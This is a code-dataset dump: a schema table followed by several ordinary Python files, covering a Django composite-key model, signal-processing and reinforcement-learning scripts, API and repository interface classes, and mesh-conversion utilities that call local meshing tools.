Dataset schema (⌀ marks columns that contain null values):

| column | dtype | values / range |
|---|---|---|
| hexsha | stringlengths | 40-40 |
| size | int64 | 5-2.06M |
| ext | stringclasses | 10 values |
| lang | stringclasses | 1 value |
| max_stars_repo_path | stringlengths | 3-248 |
| max_stars_repo_name | stringlengths | 5-125 |
| max_stars_repo_head_hexsha | stringlengths | 40-78 |
| max_stars_repo_licenses | listlengths | 1-10 |
| max_stars_count | int64 ⌀ | 1-191k |
| max_stars_repo_stars_event_min_datetime | stringlengths ⌀ | 24-24 |
| max_stars_repo_stars_event_max_datetime | stringlengths ⌀ | 24-24 |
| max_issues_repo_path | stringlengths | 3-248 |
| max_issues_repo_name | stringlengths | 5-125 |
| max_issues_repo_head_hexsha | stringlengths | 40-78 |
| max_issues_repo_licenses | listlengths | 1-10 |
| max_issues_count | int64 ⌀ | 1-67k |
| max_issues_repo_issues_event_min_datetime | stringlengths ⌀ | 24-24 |
| max_issues_repo_issues_event_max_datetime | stringlengths ⌀ | 24-24 |
| max_forks_repo_path | stringlengths | 3-248 |
| max_forks_repo_name | stringlengths | 5-125 |
| max_forks_repo_head_hexsha | stringlengths | 40-78 |
| max_forks_repo_licenses | listlengths | 1-10 |
| max_forks_count | int64 ⌀ | 1-105k |
| max_forks_repo_forks_event_min_datetime | stringlengths ⌀ | 24-24 |
| max_forks_repo_forks_event_max_datetime | stringlengths ⌀ | 24-24 |
| content | stringlengths | 5-2.06M |
| avg_line_length | float64 | 1-1.02M |
| max_line_length | int64 | 3-1.03M |
| alphanum_fraction | float64 | 0-1 |
| count_classes | int64 | 0-1.6M |
| score_classes | float64 | 0-1 |
| count_generators | int64 | 0-651k |
| score_generators | float64 | 0-1 |
| count_decorators | int64 | 0-990k |
| score_decorators | float64 | 0-1 |
| count_async_functions | int64 | 0-235k |
| score_async_functions | float64 | 0-1 |
| count_documentation | int64 | 0-1.04M |
| score_documentation | float64 | 0-1 |
49c08ac397715e801d537d9aef1fa2cc32d852d3 | 3,915 | py | Python | composite.py | ubuviz/vizion-composite-key | c8b549bb158fe64013d3db2074e3330a942509ab | ["MIT"] | null | null | null | composite.py | ubuviz/vizion-composite-key | c8b549bb158fe64013d3db2074e3330a942509ab | ["MIT"] | null | null | null | composite.py | ubuviz/vizion-composite-key | c8b549bb158fe64013d3db2074e3330a942509ab | ["MIT"] | 1 | 2021-06-27T15:49:18.000Z | 2021-06-27T15:49:18.000Z |
"""
This module provides a ``CompositePKModel`` which allows for basic retrieval
and saving of models with composite keys.
It is limited to the above tasks, and any use of the model past this is not
guaranteed to work.
A model with composite PK should look something like this::
from composite_pk import composite
class Lot(composite.CompositePKModel):
auction = models.ForeignKey(Auction, primary_key=True)
lot_number = models.IntegerField(primary_key=True)
objects = composite.CompositePKManager()
So it must:
* subclass the ``CompositePKModel``,
* have two or more fields which set the ``primary_key`` attribute to True,
and
* use the ``CompositePKManager`` as the initial manager.
"""
__version__ = "1.0.1"
__author__ = "Ubuviz"
from django.db import models
from django.db.models.base import ModelBase
class CompositePKModelBase(ModelBase):
def __new__(cls, name, bases, attrs, **kwargs):
cls = super(CompositePKModelBase, cls).__new__(cls, name, bases, attrs, **kwargs)
if hasattr(cls, '_meta'):
if hasattr(cls, '_primary_keys'):
cls._primary_keys = cls._primary_keys[:]
else:
cls._primary_keys = []
for field in cls._meta.fields:
if not field.primary_key:
continue
field.primary_key = False
cls._primary_keys.append(field.name)
# Although setting the meta PK to None seems like a good idea, the PK is
# still needed in a lot of places, which is why the following line is
# left commented out.
#cls._meta.pk = None
return cls
class CompositePKModel(models.Model, metaclass=CompositePKModelBase):
class Meta:
abstract = True
def _get_pk_val(self, *args, **kwargs):
if self._primary_keys:
pk = {}
for field_name in self._primary_keys:
attr = self._meta.get_field(field_name).attname
pk[field_name] = getattr(self, attr)
return pk
return super(CompositePKModel, self)._get_pk_val(*args, **kwargs)
def _set_pk_val(self, *args, **kwargs):
return super(CompositePKModel, self)._set_pk_val(*args, **kwargs)
pk = property(_get_pk_val, _set_pk_val)
class CompositePKQuerySet(models.query.QuerySet):
def _expand_pk(self, kwargs):
"""
Expand a composite primary key into the fields it represents into a
kwargs dictionary.
The dictionary is modified inline rather than a modified copy returned.
"""
for key, value in kwargs.items():
if '__' in key:
field, remainder = key.split('__', 1)
else:
field, remainder = key, ''
if field != 'pk':
continue
if isinstance(value, dict):
del kwargs['pk']
for pk_field in self.model._primary_keys:
kwargs['%s%s' % (pk_field, remainder)] = value[pk_field]
def filter(self, *args, **kwargs):
"""
Returns a new QuerySet instance with the args ANDed to the existing
set.
"""
self._expand_pk(kwargs)
return self._filter_or_exclude(False, *args, **kwargs)
def exclude(self, *args, **kwargs):
"""
Returns a new QuerySet instance with NOT (args) ANDed to the existing
set.
"""
self._expand_pk(kwargs)
return self._filter_or_exclude(True, *args, **kwargs)
class CompositePKManager(models.Manager):
use_for_related_fields = True
def get_query_set(self):
"""Returns a new QuerySet object. Subclasses can override this method
to easily customize the behavior of the Manager.
"""
return CompositePKQuerySet(self.model, using=self._db)
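# Illustrative usage sketch (not part of the original file), assuming the Lot
# model from the module docstring above, on an old Django version where
# get_query_set() is still the manager hook:
#
# lot = Lot.objects.create(auction=auction, lot_number=7)
# lot.pk                      # -> {'auction': <auction id>, 'lot_number': 7}
# # 'pk' lookups against a dict are expanded into the underlying fields:
# Lot.objects.get_query_set().filter(pk={'auction': auction.id, 'lot_number': 7})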
| 32.090164 | 89 | 0.614049 | 3,019 | 0.771137 | 0 | 0 | 0 | 0 | 0 | 0 | 1,533 | 0.391571 |
49c27444ea8191b6871d22350e36ce9770315509 | 752 | py | Python | qurry/libraries/standard_library/constructs/gaussian.py | LSaldyt/curry | 9004a396ec2e351aa143a10a53156649a6747343 | ["MIT"] | 11 | 2018-07-28T17:08:23.000Z | 2019-02-08T03:04:03.000Z | qurry/libraries/standard_library/constructs/gaussian.py | LSaldyt/Qurry | 9004a396ec2e351aa143a10a53156649a6747343 | ["MIT"] | 33 | 2019-07-09T09:46:44.000Z | 2019-09-23T23:44:37.000Z | qurry/libraries/standard_library/constructs/gaussian.py | LSaldyt/Qurry | 9004a396ec2e351aa143a10a53156649a6747343 | ["MIT"] | 4 | 2019-05-28T01:27:49.000Z | 2019-12-26T18:01:51.000Z |
from math import erf, sqrt
from functools import partial
from ..library.multinomial import multinomial, to_multinomial
def gaussian_cdf(x, mu, sigma):
# CDF of a normal distribution with mean mu and standard deviation sigma
y = (1.0 + erf((x - mu) / (sigma * sqrt(2.0)))) / 2.0
assert y >= 0 and y <= 1.0, 'y is not a valid probability: y={}'.format(y)
return y
def gaussian_cdfp(mu, sigma):
return partial(gaussian_cdf, mu=mu, sigma=sigma)
def gaussian(mu, sigma, block, kernel=None):
'''
Construct to create a discrete approximation of the gaussian distribution using mu and sigma
(gaussian 0 1 blocka)
'''
return multinomial(*multinomial(-3, 3, 64, gaussian_cdfp(float(mu), float(sigma))), offset=block, definitions=kernel.definitions)
| 34.181818 | 133 | 0.668883 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 170 | 0.226064 |
49c3520395affa81361da9069657257acb15bac3 | 8,299 | py | Python | tmac/models.py | Nondairy-Creamer/tmac | d688b58f13f398f83ea0bdad139e69b74398c1be | ["MIT"] | null | null | null | tmac/models.py | Nondairy-Creamer/tmac | d688b58f13f398f83ea0bdad139e69b74398c1be | ["MIT"] | null | null | null | tmac/models.py | Nondairy-Creamer/tmac | d688b58f13f398f83ea0bdad139e69b74398c1be | ["MIT"] | null | null | null |
import numpy as np
import torch
import time
from scipy import optimize
from scipy.stats import norm
import tmac.probability_distributions as tpd
import tmac.fourier as tfo
def tmac_ac(red_np, green_np, optimizer='BFGS', verbose=False, truncate_freq=False):
""" Implementation of the Two-channel motion artifact correction method (TMAC)
This is tmac_ac because it is the additive and circular boundary version
This code takes in imaging fluorescence data from two simultaneously recorded channels and attempts to remove
shared motion artifacts between the two channels
Args:
red_np: numpy array, [time, neurons], activity independent channel
green_np: numpy array, [time, neurons], activity dependent channel
optimizer: string, scipy optimizer
verbose: boolean, if true, outputs when inference is complete on each neuron and estimates time to finish
truncate_freq: boolean, if true, truncates low-amplitude frequencies in the Fourier domain. This should give the same
results but may introduce sensitivity to the initial conditions
Returns: a dictionary containing: all the inferred parameters of the model
"""
# optimization is performed using Scipy optimize, so all tensors should stay on the CPU
device = 'cpu'
dtype = torch.float64
red_nan = np.any(np.isnan(red_np))
red_inf = np.any(np.isinf(red_np))
green_nan = np.any(np.isnan(green_np))
green_inf = np.any(np.isinf(green_np))
if red_nan or red_inf or green_nan or green_inf:
raise Exception('Input data cannot have any nan or inf')
# convert data to units of fold mean and subtract mean
red_np = red_np / np.mean(red_np, axis=0) - 1
green_np = green_np / np.mean(green_np, axis=0) - 1
# convert to tensors and fourier transform
red = torch.tensor(red_np, device=device, dtype=dtype)
green = torch.tensor(green_np, device=device, dtype=dtype)
red_fft = tfo.real_fft(red)
green_fft = tfo.real_fft(green)
# estimate all model parameters from the data
variance_r_noise_init = np.var(red_np, axis=0)
variance_g_noise_init = np.var(green_np, axis=0)
variance_a_init = np.var(green_np, axis=0)
variance_m_init = np.var(red_np, axis=0)
# initialize length scale using the autocorrelation of the data
length_scale_a_init = np.zeros(red_np.shape[1])
length_scale_m_init = np.zeros(red_np.shape[1])
for n in range(green_np.shape[1]):
# approximate as the standard deviation of a gaussian fit to the autocorrelation function
length_scale_m_init[n] = initialize_length_scale(red_np[:, n])
length_scale_a_init[n] = initialize_length_scale(green_np[:, n])
# preallocate space for all the training variables
a_trained = np.zeros(red_np.shape)
m_trained = np.zeros(red_np.shape)
variance_r_noise_trained = np.zeros(variance_r_noise_init.shape)
variance_g_noise_trained = np.zeros(variance_g_noise_init.shape)
variance_a_trained = np.zeros(variance_a_init.shape)
length_scale_a_trained = np.zeros(length_scale_a_init.shape)
variance_m_trained = np.zeros(variance_m_init.shape)
length_scale_m_trained = np.zeros(length_scale_m_init.shape)
# loop through each neuron and perform inference
start = time.time()
for n in range(red_np.shape[1]):
# get the initial values for the hyperparameters of this neuron
# All hyperparameters are positive so we fit them in log space
evidence_training_variables = np.log([variance_r_noise_init[n], variance_g_noise_init[n], variance_a_init[n],
length_scale_a_init[n], variance_m_init[n], length_scale_m_init[n]])
# define the evidence loss function. This function takes in and returns pytorch tensors
def evidence_loss_fn(training_variables):
return -tpd.tmac_evidence_and_posterior(red[:, n], red_fft[:, n], training_variables[0],
green[:, n], green_fft[:, n], training_variables[1],
training_variables[2], training_variables[3],
training_variables[4], training_variables[5],
truncate_freq=truncate_freq)
# a wrapper function of evidence that takes in and returns numpy variables
def evidence_loss_fn_np(training_variables_in):
training_variables = torch.tensor(training_variables_in, dtype=dtype, device=device)
return evidence_loss_fn(training_variables).numpy()
# wrapper function for the Jacobian of the evidence that takes in and returns numpy variables
def evidence_loss_jacobian_np(training_variables_in):
training_variables = torch.tensor(training_variables_in, dtype=dtype, device=device, requires_grad=True)
loss = evidence_loss_fn(training_variables)
return torch.autograd.grad(loss, training_variables, create_graph=False)[0].numpy()
# optimization function with Jacobian from pytorch
trained_variances = optimize.minimize(evidence_loss_fn_np, evidence_training_variables,
jac=evidence_loss_jacobian_np,
method=optimizer)
# calculate the posterior values
# The posterior is gaussian so we don't need to optimize, we find a and m in one step
trained_variance_torch = torch.tensor(trained_variances.x, dtype=dtype, device=device)
a, m = tpd.tmac_evidence_and_posterior(red[:, n], red_fft[:, n], trained_variance_torch[0], green[:, n], green_fft[:, n], trained_variance_torch[1],
trained_variance_torch[2], trained_variance_torch[3], trained_variance_torch[4], trained_variance_torch[5],
calculate_posterior=True, truncate_freq=truncate_freq)
a_trained[:, n] = a.numpy()
m_trained[:, n] = m.numpy()
variance_r_noise_trained[n] = torch.exp(trained_variance_torch[0]).numpy()
variance_g_noise_trained[n] = torch.exp(trained_variance_torch[1]).numpy()
variance_a_trained[n] = torch.exp(trained_variance_torch[2]).numpy()
length_scale_a_trained[n] = torch.exp(trained_variance_torch[3]).numpy()
variance_m_trained[n] = torch.exp(trained_variance_torch[4]).numpy()
length_scale_m_trained[n] = torch.exp(trained_variance_torch[5]).numpy()
if verbose:
decimals = 1e3
# print out timing
elapsed = time.time() - start
remaining = elapsed / (n + 1) * (red_np.shape[1] - (n + 1))
elapsed_truncated = np.round(elapsed * decimals) / decimals
remaining_truncated = np.round(remaining * decimals) / decimals
print(str(n + 1) + '/' + str(red_np.shape[1]) + ' neurons complete')
print(str(elapsed_truncated) + 's elapsed, estimated ' + str(remaining_truncated) + 's remaining')
trained_variables = {'a': a_trained,
'm': m_trained,
'variance_r_noise': variance_r_noise_trained,
'variance_g_noise': variance_g_noise_trained,
'variance_a': variance_a_trained,
'length_scale_a': length_scale_a_trained,
'variance_m': variance_m_trained,
'length_scale_m': length_scale_m_trained,
}
return trained_variables
def initialize_length_scale(y):
""" Function to fit a Gaussian to the autocorrelation of y
Args:
y: numpy vector
Returns: Standard deviation of a Gaussian fit to the autocorrelation of y
"""
x = np.arange(-len(y)/2, len(y)/2) + 0.5
y_z_score = (y - np.mean(y)) / np.std(y)
y_corr = np.correlate(y_z_score, y_z_score, mode='same')
# fit the std of a gaussian to the correlation function
def loss(p):
return p[0] * norm.pdf(x, 0, p[1]) - y_corr
p_init = np.array((np.max(y_corr), 1.0))
p_hat = optimize.leastsq(loss, p_init)[0]
# return the standard deviation
return p_hat[1]
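# Illustrative call (not part of the original module): tmac_ac expects two
# [time, neurons] arrays from simultaneously recorded channels; the toy data
# below is made up purely to show the input/output shapes.
#
# rng = np.random.default_rng(0)
# toy_red = rng.random((200, 2)) + 1.0    # activity-independent channel
# toy_green = rng.random((200, 2)) + 1.0  # activity-dependent channel
# results = tmac_ac(toy_red, toy_green, verbose=True)
# results['a'].shape, results['m'].shape  # inferred activity and motion, both [time, neurons]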
| 49.106509 | 156 | 0.662128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,439 | 0.293891 |
49c41f791b3306b65a7220115c0864d09f5d6134 | 2,166 | py | Python | demo.py | TianhongDai/esil-hindsight | b7c22da087095610018f281245fd4f622ef190ed | ["MIT"] | 5 | 2020-10-14T14:10:27.000Z | 2020-11-23T12:46:08.000Z | demo.py | TianhongDai/esil-hindsight | b7c22da087095610018f281245fd4f622ef190ed | ["MIT"] | 5 | 2020-10-14T18:57:37.000Z | 2021-10-21T11:10:12.000Z | demo.py | TianhongDai/esil-hindsight | b7c22da087095610018f281245fd4f622ef190ed | ["MIT"] | 1 | 2021-12-01T08:55:28.000Z | 2021-12-01T08:55:28.000Z |
from arguments import get_args
import numpy as np
from network.models import MLP_Net
from utils.utils import get_env_params
import torch
import os, gym
"""
script to watch the demo of the ESIL
"""
# process the inputs
def process_inputs(o, g, o_mean, o_std, g_mean, g_std, args):
o_clip = np.clip(o, -args.clip_obs, args.clip_obs)
g_clip = np.clip(g, -args.clip_obs, args.clip_obs)
o_norm = np.clip((o_clip - o_mean) / (o_std), -args.clip_range, args.clip_range)
g_norm = np.clip((g_clip - g_mean) / (g_std), -args.clip_range, args.clip_range)
inputs = np.concatenate([o_norm, g_norm])
inputs = torch.tensor(inputs, dtype=torch.float32).unsqueeze(0)
return inputs
if __name__ == '__main__':
args = get_args()
# create environment
env = gym.make(args.env_name)
# get the environment parameters
env_params = get_env_params(env)
# start to create model
model_path = '{}/{}/model.pt'.format(args.save_dir, args.env_name)
network = MLP_Net(env_params['obs'] + env_params['goal'], env_params['action'], args.dist)
network_model, obs_mean, obs_std, g_mean, g_std = torch.load(model_path, map_location='cpu')
network.load_state_dict(network_model)
network.eval()
# start to do the testing
for i in range(args.demo_length):
observation = env.reset()
# start to do the demo
obs, g = observation['observation'], observation['desired_goal']
for t in range(env._max_episode_steps):
if args.render:
env.render()
inputs = process_inputs(obs, g, obs_mean, obs_std, g_mean, g_std, args)
with torch.no_grad():
_, pi = network(inputs)
if args.dist == 'gauss':
mean, std = pi
input_actions = mean.detach().cpu().numpy().squeeze()
else:
raise NotImplementedError
# put actions into the environment
observation_new, reward, _, info = env.step(input_actions)
obs = observation_new['observation']
print('the episode is: {}, is success: {}'.format(i, info['is_success']))
| 40.111111 | 96 | 0.636657 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 365 | 0.168513 |
49c45451bcf8f4588b0bba3456a64c9403ea4bc6 | 1,071 | py | Python | kickbase_api/models/league_user_stats.py | jhelgert/kickbase-api-python | 6e8b12c69cf36a4ce5c3ac37f9328cde5946a3e2 | ["MIT"] | 7 | 2020-08-17T07:20:30.000Z | 2022-02-03T19:21:53.000Z | kickbase_api/models/league_user_stats.py | jhelgert/kickbase-api-python | 6e8b12c69cf36a4ce5c3ac37f9328cde5946a3e2 | ["MIT"] | 4 | 2020-11-01T10:39:11.000Z | 2021-07-30T12:20:52.000Z | kickbase_api/models/league_user_stats.py | jhelgert/kickbase-api-python | 6e8b12c69cf36a4ce5c3ac37f9328cde5946a3e2 | ["MIT"] | 4 | 2020-11-01T09:12:39.000Z | 2021-08-23T13:25:00.000Z |
from datetime import datetime
from kickbase_api.models._transforms import parse_date, parse_key_value_array_to_dict
from kickbase_api.models.base_model import BaseModel
from kickbase_api.models.league_user_season_stats import LeagueUserSeasonStats
class LeagueUserStats(BaseModel):
name: str = None
profile_image_path: str = None
cover_image_path: str = None
flags: int = None
placement: int = None
points: int = None
team_value: float = None
seasons: [LeagueUserSeasonStats] = None
team_values: {datetime: float}
def __init__(self, d: dict = {}):
self._json_transform = {
"teamValues": parse_key_value_array_to_dict(lambda o: parse_date(o["d"]), lambda o: o["v"]),
"seasons": lambda v: [LeagueUserSeasonStats(_d) for _d in v]
}
self._json_mapping = {
"profileUrl": "profile_image_path",
"coverUrl": "cover_image_path",
"teamValue": "team_value",
"teamValues": "team_values"
}
super().__init__(d)
| 32.454545 | 104 | 0.655462 | 819 | 0.764706 | 0 | 0 | 0 | 0 | 0 | 0 | 135 | 0.12605 |
49c52e67e91490b5205014ce1748575c1b06124d | 9,647 | py | Python | ocradmin/lib/fcrepo/http/interfaces.py | mikesname/ocropodium | a3e379cca38dc1999349bf4e9b5608e81dc54b10 | ["Apache-2.0"] | 2 | 2015-03-30T16:36:51.000Z | 2016-06-15T01:39:47.000Z | ocradmin/lib/fcrepo/http/interfaces.py | mikesname/ocropodium | a3e379cca38dc1999349bf4e9b5608e81dc54b10 | ["Apache-2.0"] | 2 | 2021-06-10T17:43:54.000Z | 2021-12-13T19:40:08.000Z | ocradmin/lib/fcrepo/http/interfaces.py | mikesname/ocropodium | a3e379cca38dc1999349bf4e9b5608e81dc54b10 | ["Apache-2.0"] | 1 | 2015-11-08T00:40:11.000Z | 2015-11-08T00:40:11.000Z |
""" Interfaces for FCRepoRequestFactory, FCRepoResponse and FCRepoResponseBody.
"""
from exceptions import NotImplementedError
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
class I_FCRepoResponseBody:
def __init__(self, raw_content, mime_type):
""" Constructor takes two arguments:
raw_content = raw body content (Base64 encoded).
mime_type = MimeType of the body content.
"""
raise NotImplementedError
def getContent(self):
""" Returns the response body properly formatted for the MimeType.
"""
raise NotImplementedError
def getMimeType(self):
""" Returns the MimeType of the body content.
"""
raise NotImplementedError
def getRawData(self):
""" Returns the raw response body (Base64 encoded).
"""
raise NotImplementedError
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
class I_FCRepoResponse:
def __init__(self):
# init method args are implementation-dependent
pass
def getBody(self):
""" Provides access to body content enclosed in the response
"""
raise NotImplementedError
def getFooter(self, name, default):
""" Returns value of a response footer parameter. Takes two arguments:
name = name of the parameter
default = default value to be returned when parameter is NOT
in the footer.
"""
raise NotImplementedError
def getFooters(self):
""" Returns all response footer parameters as a Python dictionary.
"""
raise NotImplementedError
def getHeader(self, name, default):
""" Returns value of a response header parameter. Takes two arguments:
name = name of the parameter
default = default value to be returned when parameter is NOT
in the header.
"""
raise NotImplementedError
def getHeaders(self):
""" Returns all response header parameters as a Python dictionary.
"""
raise NotImplementedError
def getStatus(self):
""" Returns the HTTP status code returned for the request.
"""
raise NotImplementedError
def getRequestMethod(self):
""" Returns the name of the HTTP method used for the request.
"""
raise NotImplementedError
def getRequestURI(self):
""" Returns the complete escaped URI used for the request.
"""
raise NotImplementedError
def getRequest(self):
""" Returns the request method and the complete escaped request
URI as a single string.
"""
raise NotImplementedError
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
class I_FCRepoRequestFactory:
def __init__(self, repository_url, username, password, realm='any'):
""" Requires at least four arguments:
repository_url = the base URL for the Fedora Repository
including the protocol, domain, port,
and context.
username = name of a user that is authorized to perform
requests using the Fedora REST API.
password = password for the authorized user.
realm = authorization realm, must allow the string 'any' to
designate that authentication is valid for any realm.
"""
raise NotImplementedError
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def DELETE(self, request_uri):
""" Submits a DELETE request for the requested URI.
Takes a single argument:
request_uri = the query portion of the DELETE request
i.e. the URL for the request without the protocol,
domain, port and context of the Fedora Repository.
Returns results of the request as a FCRepoResponse object.
"""
raise NotImplementedError
def GET(self, request_uri):
""" Submits a GET request for the requested URI
Takes a single argument:
request_uri = the query portion of the GET request
i.e. the URL for the request without the protocol,
domain, port and context of the Fedora Repository.
"""
raise NotImplementedError
def POST(self, request_uri, content=None, chunked=False):
""" Submits a POST request for the requested URI
Takes three arguments:
request_uri = the query portion of the POST request
i.e. the URL for the request without the protocol,
domain, port and context of the Fedora Repository.
content = content to be included in the POST request (if any)
chunked = boolean indicating whether content is to be provided
in chunks.
"""
raise NotImplementedError
def PUT(self, request_uri, content=None, chunked=False):
""" Submits a PUT request for the requested URI
Takes three arguments:
request_uri = the query portion of the PUT request
i.e. the URL for the request without the protocol,
domain, port and context of the Fedora Repository.
content = content to be included in the PUT request (if any)
chunked = boolean indicating whether content is to be provided
in chunks.
"""
raise NotImplementedError
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def getAuthPassword(self):
""" Returns current value of password to be used for authenticating
access to the Fedora Repository (as set in the constructor or by
the setAuthPassword method).
"""
raise NotImplementedError
def getAuthRealm(self):
""" Returns current value of realm to be used for authenticating
access to the Fedora Repository (as set in the constructor or by
the setAuthRealm method).
"""
raise NotImplementedError
def getAuthUser(self):
""" Returns current value of the username to be used for
authenticating access to the Fedora Repository (as set in the
constructor or by the setAuthUser method).
"""
raise NotImplementedError
def getContext(self):
""" Returns current value of the context to be used for accessing
the Fedora Repository (as initialized by the constructor or
set by the setContext method).
"""
raise NotImplementedError
def getDomain(self):
""" Returns current value of the internet domain to be used for
accessing the Fedora Repository (as initialized by the constructor
or set by the setDomain method).
"""
raise NotImplementedError
def getPort(self):
""" Returns current value of the port to be used for accessing
the Fedora Repository (as initialized by the constructor or set
by the setPort method).
"""
raise NotImplementedError
def getProtocol(self):
""" Returns current value of the HTTP protocol to be used for
accessing the Fedora Repository (as initialized by the constructor
or set by the setProtocol method).
"""
raise NotImplementedError
def getRepositoryURL(self):
""" Returns current value of the root URL to be used for accessing
the Fedora Repository. It is constructed from the current values
of the HTTP protocol, repository domain name, port number and
repository context.
"""
raise NotImplementedError
def getLastRequest(self):
""" Returns a string representing the last HTTP Request that was
submitted by the factory. It will include the HTTP method and the
URL submitted. PUT and POST request strings will NOT include the
content submitted with the request.
"""
raise NotImplementedError
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def setAuthPassword(self, password):
""" Changes the value of the password to be used for authenticating
access to the Fedora Repository.
"""
raise NotImplementedError
def setAuthRealm(self, realm):
""" Changes the value of the realm to be used for authenticating
access to the Fedora Repository.
"""
raise NotImplementedError
def setAuthUser(self, username):
""" Changes the name of the user to be used for authenticating
access to the Fedora Repository.
"""
raise NotImplementedError
def setContext(self, context):
""" Changes the value of the context to be used for accessing
the Fedora Repository.
"""
raise NotImplementedError
def setDomain(self, url):
""" Changes the value of the domain to be used for accessing
the Fedora Repository.
"""
raise NotImplementedError
def setPort(self, port):
""" Changes the value of the port to be used for accessing
the Fedora Repository.
"""
raise NotImplementedError
def setProtocol(self, protocol):
""" Changes the value of the HTTP protocol to be used for accessing
the Fedora Repository.
"""
raise NotImplementedError
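# Intended interaction sketch (not part of the original file): a concrete
# implementation of I_FCRepoRequestFactory would be driven roughly like this;
# the class name FCRepoRequestFactory and the URIs below are hypothetical.
#
# factory = FCRepoRequestFactory('http://localhost:8080/fedora', 'fedoraAdmin', 'password')
# response = factory.GET('/objects/demo:1')
# if response.getStatus() == 200:
#     print(response.getBody().getContent())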
| 35.996269 | 79 | 0.59604 | 9,269 | 0.960817 | 0 | 0 | 0 | 0 | 0 | 0 | 6,801 | 0.704986 |
49c547bb09c7eed025dfa278cd31af58e1182d17 | 4,397 | py | Python | mesh_utilities.py | qingfengxia/quasi_static_metal_cutting | 9773fc0ea33c290057cb2230365094058216caf0 | ["AFL-1.1"] | 2 | 2019-07-18T18:35:31.000Z | 2021-09-12T14:00:58.000Z | mesh_utilities.py | qingfengxia/quasi_static_metal_cutting | 9773fc0ea33c290057cb2230365094058216caf0 | ["AFL-1.1"] | 1 | 2020-04-26T04:22:26.000Z | 2020-05-11T08:54:44.000Z | mesh_utilities.py | qingfengxia/quasi_static_metal_cutting | 9773fc0ea33c290057cb2230365094058216caf0 | ["AFL-1.1"] | null | null | null |
#utf8
from __future__ import print_function, division
import subprocess
import os
import os.path
import sys
import time
default_tmp_mesh_filename = '/tmp/Mesh_1.med'
# salome 9.x may be too new for this script, some version released in 2018 is better
# salome_app = '/media/sf_OneDrive/Salome-9.8.0/salome'
salome_app = '/home/qingfeng/SALOME-9.7.0/salome'
gmsh_app = '/media/sf_OneDrive/gmsh-4.10.2-Linux64/bin/gmsh'
def run_command(commandlist):
has_error = False
try:
print(commandlist)
p = subprocess.Popen(commandlist, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = p.communicate()
print(output) # stdout is still cut at some point, but the warnings are in stderr and thus printed :-)
print(error)
except:
print('Error executing: {}\n'.format(commandlist))
has_error = True
return has_error
def defined(x):
return x in locals() or x in globals()
def generate_salome_mesh(mesh_gen_script, smesh_file = default_tmp_mesh_filename):
# this function is quite specific to my pc setup
if not os.path.exists(salome_app):
print('Error: salome executable is not found in the specified path\n', salome_app)
sys.exit(-1)
salome_cmd = "{} -t -b {}".format(salome_app, mesh_gen_script)
os.system(salome_cmd) # run_command will bring up GUI, but os.system does not!
# there is salome shutdown command inside the script
#"%PYTHONBIN%" "%KERNEL_ROOT_DIR%\bin\salome\runSalome.py" -t -u myScript.py
#%PYTHONBIN% "%KERNEL_ROOT_DIR%\bin\salome\killSalome.py"
# salome_cmd = ["/opt/SALOME-8.5.0-UB16.04-SRC/salome", "-t", script]
# run_command(salome_cmd)
check_mtime(smesh_file)
def convert_salome_mesh_to_dolfin(output_dolfin_mesh, smesh_file = default_tmp_mesh_filename):
gmsh_filename = output_dolfin_mesh[:-4] + ".msh"
cmdline = "{} -format msh2 -o {} -save {}".format(gmsh_app, gmsh_filename, smesh_file)
run_command(cmdline) # check the return value 'has_error' does not always work so check the output timestamp
check_mtime(gmsh_filename)
run_command("dolfin-convert {} {}".format(gmsh_filename, output_dolfin_mesh))
check_mtime(output_dolfin_mesh)
def convert_salome_mesh_to_foam(output_foam_case_folder, smesh_file = default_tmp_mesh_filename):
gmsh_filename = smesh_file[:-4] + ".msh"
cmdline = "{} -format msh2 -o {} -save {}".format(gmsh_app, gmsh_filename, smesh_file)
run_command(cmdline)
check_mtime(gmsh_filename)
run_command("gmshToFoam -case {} {}".format(output_foam_case_folder, gmsh_filename))
check_mtime(output_foam_case_folder + '/constant/polyMesh/boundary')
def from_python_file_to_parameter_string(python_file):
#from StringIO import StringIO
#from io import stringIO
parameter_string = []
with open(python_file, "r") as inf:
lines = inf.readlines()
for i,l in enumerate(lines):
parameter_string.append(l.replace('#' , '//'))
return ''.join(parameter_string)
def generate_gmsh_mesh(mesh_file_root, mesh_parameter_string):
# if mesh_parameter_string is not provide, just use provided geo file
if mesh_parameter_string:
template_file = mesh_file_root + "_template.geo"
with open(template_file) as inf:
with open(mesh_file_root + ".geo", "w") as outf:
outf.write(mesh_parameter_string)
outf.write(inf.read())
# use gmsh4 instead gmsh3 here
gmshcmd = ['{} - -match -tol 1e-12 - {}.geo'.format(gmsh_app, mesh_file_root)]
if(run_command(gmshcmd)):
sys.exit()
check_mtime(mesh_file_root + ".msh")
# convert an existing gmsh .msh file to a dolfin .xml mesh (distinct from convert_salome_mesh_to_dolfin above)
def convert_gmsh_mesh_to_dolfin(mesh_file_root):
convertcmd= ['dolfin-convert {}.msh {}.xml'.format(mesh_file_root, mesh_file_root)]
if (run_command(convertcmd) ):
sys.exit()
check_mtime(mesh_file_root + ".xml")
def check_mtime(filename):
modified_time = os.path.getmtime(filename)
current_time = time.time() # in second since epoch
second_delta = current_time - modified_time
if second_delta > 200:
print('file `{}` modified time is more than {} seconds, mesh conversion failed?'.format(filename, second_delta))
print("file last modified at %s" % time.ctime(modified_time))
sys.exit()
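# Illustrative pipeline sketch (not part of the original file): the Salome
# script name and output names below are hypothetical, and the external tools
# (salome, gmsh, dolfin-convert, gmshToFoam) must exist at the paths configured above.
#
# generate_salome_mesh('make_mesh.py')              # writes /tmp/Mesh_1.med by default
# convert_salome_mesh_to_dolfin('workpiece.xml')    # .med -> .msh -> dolfin .xml
# convert_salome_mesh_to_foam('foam_case')          # .med -> .msh -> OpenFOAM polyMesh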
| 43.97 | 120 | 0.705254 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,527 | 0.347282 |
